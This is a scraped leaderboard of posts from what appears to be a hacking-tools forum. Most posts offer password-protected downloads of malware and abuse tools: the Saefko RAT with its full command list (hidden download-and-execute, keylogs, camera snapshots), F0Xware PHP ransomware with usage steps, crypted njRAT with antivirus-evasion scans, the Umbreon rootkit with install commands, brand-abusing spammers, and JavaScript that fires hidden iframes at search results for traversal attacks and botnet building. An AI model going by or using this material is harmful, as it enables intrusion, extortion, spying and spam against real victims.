Leaderboard

The search index is currently processing. Leaderboard results may not be complete.

Popular Content

Showing content with the highest reputation on 02/09/2019 in all areas

  1. 4 points
    Free .NET obfuscator is an online obfuscation tool that helps protect .NET exes and dlls against reverse-engineering by making it difficult for a third-party to access your source code. [HIDE][Hidden Content]]
  2. 2 points
    Recently added: - Outlook Password Recovery - Thunderbird Password Recovery - Reverse Proxy Download [Hidden Content]
  3. 1 point
    Saefko Attack Systems the most advance RAT-BOT-AGENT ever created This is "a multi protocol multi operating system" remote administration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first Unlimited number of machines to control. Extreme reliability. Android and Windows control at the same time. No port forwarding. No mysql. This project was designed to replace all RAT/BOTS that are made to control remote machine,the problem with all current RATS/BOTS that they are unreliable and limited , you cant in 99.9% of the time have more than 100 machine or victim due to self flooding , self flooding meaning when the client connect to the server directly "when the rat connect to the attacker pc through TCP" . When the number of connected clients increased this acte as flood attack, so you will be limited to some low number and you will end up with lagy unreliable connection to the target machines. That's from the side of TCP rats the other side is the http bots ,that use a remote server containing some php scripts and mysql server , this design can handle unlimited number of machines in theory , but the problem with this design is that you do not have a direct connection to the machine so you are limited to http tasks and this dose not give you much control so that was just a quick short overview on some of extreme problems that RATS/BOTS facing with current techs,in Saefko Attack Systems "SAS" you combining both of these types of connections and adding IRC Protocol to the mix you will end up with extremely reliable connection to the target machine,SAS will handle millions of connections with direct TCP communications established through IRC networks any time any place all wither. Fast Setup Youtube : Main Windows Public HTTP Tasks Windows Build Android Build Command And Control Sections Android Command And Control Sections Android IRC Commands ANDROID COMMANDS [msg] Show toast message. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [ping] Ping the agent machine to check if still active. [location] Get geo location information based on 'ipinfo.com'. [flashon] Turn the dvice flash on. [flashoff] Turn the dvice flash on. [wakeup] Turn dvice screen on. [screenshot] Take a screenshot to from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Android TCP Commands Android Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Now Windows Command And Control Windows IRC Commands WINDOWS COMMANDS [pwd] Show current directory. [screenshot] Take a screenshot to from the target machine. [opencd] Open cd rom. [closecd] Close cd rom. [ping] Ping the agent machine to check if still active. [camlist] Get a list of available camera devices. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [location] Get geo location information based on 'ipinfo.com'. [opencd] Open cd rom. [keylogs] Get agent saved keylogs through HTTP drop point. [shell] Run shell commands. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [uninstall] Uninstall the agent completely from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Windows TCP Commands Windows Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Download: [Hidden Content]
  4. 1 point
    More than 3000 configs... download [Hidden Content]
  5. 1 point
    [Hidden Content] Pass: level23hacktool
  6. 1 point
    F0Xware is a PHP ransomware this project is for educational purposes only F0Xware is a php ransomware. it can be used to encrypt/decrypt any website You need 2 things 1 -> this repo 2 -> backdoor access to a website after uploading it open file xyz.com/foxware.php it has error 404 hidden login so on center there is form enter password: TheF0X then enter a key select encrypt now to decrypt again go to foxware.php now enter same key and select decrypt to change deface page just go to line 113 and copy everything in double quotes then go to base64decode.org decode it edit it encode it in base 64 then replace at line 113 and replace. [HIDE][Hidden Content]]
  7. 1 point
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  8. 1 point
    Scan: Stub(0/22) :[Hidden Content] Njrat before(21/22) :[Hidden Content] Njrat after(0/22) :[Hidden Content] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  9. 1 point
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  10. 1 point
    Scan: [Hidden Content] Download: [HIDE][Hidden Content]] Passwoord: level23hacktools.com
  11. 1 point
    Branded Spammer v1 is a tool that sends spam from reputable sources. Basically what it does is sending emails from online stores to the email of your choice. This demo version is limited and can only send a limited number of emails. Download: [hide][Hidden Content]] Virus Scan [hide][Hidden Content]]
  12. 1 point
    MyRED Spammer 1.1 is a free spammer for MyRED domains. How to use? You can use this tool to send spam to anyone but it's best used by registering an email and send the invitations to you. Register as many domains as you want for free for any type of business. Download [hide][Hidden Content]] Virus Scan [hide][Hidden Content]]
  13. 1 point
    A collection of scripts to extend Burp Suite burpAuthorizationHeaderProcessorExtension.py burpCookieProcessorExtensionTemplate.p burpHeaderProcessorExtensionTemplate.py burpSiteMapLoader.py burpVwatIdDecoderExtension.py encodeDecodeHash.py [HIDE][Hidden Content]] A collection of scripts used to interact with the Burp Rest API burp_scanwalker.py [HIDE][Hidden Content]] By laconicwolf
  14. 1 point
    [HIDE][Hidden Content]]
  15. 1 point
    Automated pentest framework for offensive security experts [HIDE][Hidden Content]] Sn1per v6.1 – New Features & Fixes Added automated web scanning via Burpsuite Pro 2.x API for all ‘web’ mode scans Added Waybackmachine URL retrieval to all web scans Converted all exploits to Metasploit Added configuration options to set LHOST/LPORT for all Metasploit exploits in sniper.conf Added improved web brute force dictionaries for all modes Added individual logging for all tools under the loot directory Added new sniper.conf options to enabled/disable all plugins and change settings per user Fixed issue with CMSMap install/usage Fixed issue with WPScan gem dependency missing (public_suffix) Fixed timeout setting in cutycapt Fixed issue with theharvester not running correctly Fixed issue with Amass not running due to invalid command line options in latest release Fixed issue with Sn1per Professional notepad.html missing Cleaned up plugins and install dependencies list
  16. 1 point
    Build websites faster with Pinegrow 5 a Mac, Windows and Linux web editor that lets you build responsive websites faster with live multi-page editing, CSS & SASS styling, CSS Grid editor and smart components for Bootstrap, Foundation and WordPress. Pinegrow is a desktop website builder that opens and saves standard HTML and CSS files. That means: Your work won’t be locked into a proprietary file format. Just open and edit your existing projects. You can use Pinegrow alongside other web development tools. You can build websites offline, without internet connection. New in 5.2 CSS Grid validation, usability improvements, WordPress builder enhancements and more. Learn more. [Hidden Content] [Hidden Content]
  17. 1 point
    [HIDE][Hidden Content]] Ex:
  18. 1 point
    [HIDE][Hidden Content]] [Hidden Content]
  19. 1 point
    [Hidden Content]
  20. 1 point
    Free Email SPAM v1.0 is a program that takes advantage of super brands to send spam to user emails. This is the most elitist method of delivery spam online. Free Email SPAM v1.0 - Added Countries: Germany, Italy, Mexico, Netherlands, Portugal, Russia, Spain, Turkey & USA Free Email SPAM v1.0 - Added Super Brands Otto, Postbank.de, Idealo, Bijou Brigitte, Calzedonia, Gobierno del Mexico, Focus Online NL, Jornal A Bola, Jornal Record, Jornal Publico, Jornal JN, Jornal O Jogo, Jornal de Negocios, Noticias ao Minuto, Clube FC Porto, Clube SL Benfica, Clube Sporting de Portugal, Jornal Diario de Noticias, Jornal DNoticias, Agência Abreu, Ourivesaria Atlantis, Bershka, Boutique Dos Relógios, Cortefiel, Inside Shops, Mister Minit, Oysho, Intimissimi, iStore, Lion Of Porches, Prof, Salsa Star, Springfield, Women Secret, Tiffosi, Zara, H&M Fashion, Sport Zone, Massimo Dutti, Punt Roma, AKI, Deichmann, Azarius, KP.ru, DNS Shop, MVideo, Tino Gonzalez, Milliyet, Haber Turk, Walmart, Columbia Sportswear. Note: Reply with your country or super brand that you would like to add. Download: [hide][Hidden Content]] Virustotal: [hide][Hidden Content]]
  21. 1 point
    [HIDE][Hidden Content]] Pass: level23hacktools.com
  22. 1 point
    Metasploit Framework: The Most Used Penetration Testing Framework Metasploit Framework can be used to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. It simply helps you to find, exploit, and validate vulnerabilities. If you are a pentester, cybersecurity researcher, tester, programmer or freestyler, the Metasploit Framework is all you need. Can be used for both legitimate and unauthorized activities, but we’re strongly suggest you to behave, and use this awesome pentesting framework to test your systems, help attack prevention and rise cybersecurity awareness. [HIDE][Hidden Content]]
  23. 1 point
    GoScan is an interactive network scanner client, featuring auto-completion, which provides abstraction and automation over nmap. Although it started as a small side-project I developed in order to learn @golang, GoScan can now be used to perform host discovery, port scanning, and service enumeration not only in situations where being stealthy is not a priority and time is limited (think at CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements. GoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of "screen", etc.), given that it fires scans and maintain their state in an SQLite database. Scans run in the background (detached from the main thread), so even if connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong. [HIDE][Hidden Content]]
  24. 1 point
    [Hidden Content] Pass: level23hacktools.com [Hidden Content]
  25. 1 point
  26. 1 point
  27. 1 point
    [Hidden Content] Features ■ Encrypted Wi-Fi connection Our private encryption ‘tunnel’ prevents hackers from stealing your data via public/open WiFi ‘hotspot’ networks. Secure your WiFi and privacy. ■ Private, anonymous browsing Browse the web anonymously and privately. Your internet connection will look like it originates from a different location. Use it to unblock and anonymize your access to geo-restricted web content. United States ■ Choose country If you travel and need web access from different locations, you may find some sites blocked, but you can unblock websites. Use our servers located in multiple countries (e.g. UK, USA, etc.) to access more web content from your phone, as your shown geo-IP address will be different from the real one. ■ Automatic VPN reconnect Do not worry about leaking your data. VPN can be turned on in automatic mode to establish a VPN connection right before any data is sent to the Internet.
  28. 1 point
  29. 1 point
    How To Make Private HQ Dorks 2019 [HIDE][Hidden Content]] Pass: level23hacktools.com Tools: TSP Dork generator_v8.0_1 Keywords Grabber v2.0 Text Utilities
  30. 1 point
    Normally a user uses Google to search and this results are showned in a page with 10 results to a maximum of 1000 results. Since anyone uses Google to search they have release a way to narrow the results down to a few domains. This is called CSE (Custom Search Engine). Recently Google have release a method to get results using CSE in a whitelabel basis. This means that the results won't show any reference to Google and a user can retrieve up to 10 results. This page results delivers 10 links from the search engine using a keyword you want. Instead of showing the results, the webmaster can convert the results to actionable items. For example: a iframe. This can be used to make File Path Traversal attacks, Directory Traversal attacks or build your own botnet by gathering information using dorks and creating custom HTTP attacks. So, let start. Requirements Google API account Google CSE account Some coding... Start by creating a CSE engine with the sites: "*.com*" and get the search engine code "cx=...something goes here". Open notepad and paste this code > <script> var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { var myObj = JSON.parse(this.responseText); document.write('<center><table><tr><td>'); for (x in myObj.items) { document.write('<iframe src="'+ myObj.items[x].link +'/YOUR-ACTIONABLE-DORK-GOES" height="0" width="0" frameborder="0">');} }; xmlhttp.open("GET", "[Hidden Content]", true); xmlhttp.send(); } </script> Change the document.write code to your hack. Change key to yours. Change cx to your search engine.
  31. 1 point
    I wonder how much it takes the program from time to time to finish because his work is more than 15 hours and so far has not ended this is Results so far [Hidden Content] How do I know it's finish or not?
  32. 1 point
    Download [Hidden Content] Pass level23hacktools
  33. 1 point
    Umbreon Rootkit ------------------------------------------------------------------------------------------------------------------------------ You're Welcome Faggots! ------------------------------------------------------------------------------------------------------------------------------ Dependencies: OpenSSL binaries, libs, headers (or a smart user) Password hashing format is Whirlpool. There's a tool included in utils. The installer actually uses this, but your mileage may vary compiling it on strange systems. If you run into issues just edit the installer script a bit. Bring a static-compiled pwgen and unfuck if you're desperate to get it working ------------------------------------------------------------------------------------------------------------------------------ To use(Don't be stupid!) bash setup bash root.sh [USERNAME] [PASSWORD] - This will set the login to the rootkit user ------------------------------------------------------------------------------------------------------------------------------ Extra Files: portchecker | checks specified port promptlog | successful SSH root passwords ------------------------------------------------------------------------------------------------------------------------------ To Fix Server If #RIPed compile and run utils/unfuck.c Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  34. 1 point
    28kmValid Checked [HIDE][Hidden Content]]
  35. 1 point
    The tool contains many programs, run this tool in a virtual environment to avoid possible infections, warning is left. Crackers Kit 2018 By Avi_RE 100+ tools 1. Analysis 1. Olly 1.10 2. Olly 2.01 3. X64 Dbg (x86 & x64 bit) 4. IDA 7.0 (X86 & X64 bit) 5. Dnspy 4.0 (x86 & x64 bit) 2. Detector 1. Detect it easy 1.01 2. Exeinfope 3. PEiD 4. RDG Packer Detector 2017 5. Prtection ID 3. Packer 1. AsPack 2.42 2. BoxedApp Packer 3.2.3 3. PEcompact 3.11 4. Upx 3.94 GUI 5. CryptoObfusator 2015 Build 170126 6. Code Virtualizer 2.1.1.0 7. Mpress 2.19 GUI 4.Unpacker 1. Armadillo Unpacker i. Armageddon 2.2 ii. DilloDie 1.6 2. AsPack Unpacker i. Aspack Unpacker 1.13 ii. Aspack Die iii. Aspack Stripper 2.12 3. Asprotect Unpacker 4. Upx Unpacker i. Upx Unpacker 1 ii. Upx Unpacker 2 5. VM Unpacker 6. De4Dot Support Reactor 5.0 GUI 7. Universal Unpacker Team-REPT 8. AoRE Unpacker i. UnTheminda 2.0 ii. Untheminda 3.0 iii. Upx Unpacker iv. Universal Unpacker 9. RL!de Unpacker (18 Unpacker) i. Aspack 2.x Unpacker ii. Exe Unpacker 1.x iii. Crypto Pe protector unpacker iv. exe Fog Unpacker v. FSG 1.x Unpacker vi. Upx 1.xx 2.xx Unpacker vii. Goatepe multiator 1.6 Unpacker viii. Humimy Unpacker ix. MEW 1.x Unpacker x. Npack Unpacker xi. ELock Unpacker xii. Generic Unpacker xiii. Packman 1.x Unpacker xiv. Pecompact 2.x Unpacker xv. Pex 0.99 Unpacker xvi. ShrinkWrap Unpacker xvii. Winunpack Unpacker xviii. Yoda Unpacker 10. ILProtect Unpacker 11. DNGuard HVM Unpacker 12. NET Unpacker 5. Decompiler 1. .Net Refelector 9.0 2. VB Decompiler 10.1 3. Java Decompiler 4. Jar Explorer 6. Protector 1. Agile.net v6.3.0.5 2. ConfuserEx V0.2.2 Modded 3. Eziriz NetReactor 5.0 4. Eziriz IntelliLock 2.0 5. Armadillo V9.64 6. Private Exe Protector 5.0.0.5 7. Safengine Protector 2.3.9.0 8. Theminda 2.4.6.0 (x86 & x64 Bit) 9. The Engima Protector 10. Winlicense 2.4.5 (x86 & x64 Bit) 11. Yoda Protactor 1.03.2 12. VMProtect Ultimate 3.0.9 13. Droid Guard 1.0.0.5 (Apk Protector) 7. Patchers 1. AT4RE Patcher 2. .Net Patcher 3. DUP 2.26.1 4. Keygen Maker 5. Keygening Tool 2.0 8. PE Tools 1. Resource Hacker 2. Resource Tuner 3. PE Explorer 4. CFF Explorer 5. PPEE 1.10 9. Android RE 1. APK Tools 3.50 2. ApkIDE 3.0.1.0 3. Android Cracker Kit 0.2 4. Uret Android Reverse Toolkit 1.6 10. DotNet Tools 1. dotRenamer 2. ilProtector 2.0.14 3. NetShrink 2.6 4. String obfustcator 5. ILSPY 6. Confuser Tools i. Confuser Delegate Killer ii. ConfuserEx Call Fixer iii. ConfuserEx cfg Killer iv. ConfuserEx Constant Decryptor v. ConfuserEx Expression Killer vi. ConfuserEx Predicate Killer vii.ConfuserEx String Decryptor viii. ConfuserEx Switch Killer 7. Mega Dumper 11. HEX Tools 1. WinHex 19.3 (x86 & x64 Bit) 2. Hex Workshop 6 (x86 & x64 Bit) 12. Extra 1. ImpREC 1.7e 2. Circuit's Cracker Tool 3. Windows Hack 3.0 4. SnD Reverser Tool 1.4 5. Universal Extractor 1.9 6. Reg From App 7. Process Activity View 8. Run As Date 9. String Decryptor 10. File Uploader i. RGHost_Uploader ii. Zippy_Uploader Download: [hide][Hidden Content]] Password: level23hacktools.com
  36. 1 point
    i am interest this antidetect
  37. 1 point
    Re: 888 Private RAT (Cracked) Tienes los puertos abiertos en el router?